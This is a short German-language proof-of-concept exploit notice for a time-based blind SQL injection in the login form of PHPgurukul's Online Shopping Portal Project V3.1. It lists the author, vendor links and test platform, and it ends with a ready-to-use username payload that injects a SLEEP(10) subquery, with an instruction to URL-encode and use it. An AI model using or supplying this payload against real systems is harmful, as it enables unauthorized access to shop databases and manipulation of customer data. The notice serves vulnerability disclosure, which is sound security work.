
poc
Das Online Shopping Portal Project V3.1 ermöglicht es entfernten Angreifern, beliebige SQL-Befehle/-Abfragen über das Anmeldeformular auszuführen, was zu unbefugtem Zugriff und potenzieller Datenmanipulation führt. Diese Schwachstelle entsteht durch unzureichende Validierung der vom Benutzer bereitgestellten Eingaben im Benutzernamenfeld, was SQL-Injection-Angriffe ermöglicht.
Exploit-Titel: Online Shopping Portal Project V3.1 PHPgurukul - Time-Based Blind Sqli
Exploit-Autor: Akshad Joshi
Hersteller-Homepage: https://phpgurukul.com
Software-Link: https://phpgurukul.com/shopping-portal-free-download/
Getestet auf: Linux
Verwenden Sie dieses Payload (URL-encodieren Sie es):
[email protected]' AND (SELECT 1866 FROM (SELECT(SLEEP(10)))JHcH) AND 'GMDH'='GMDH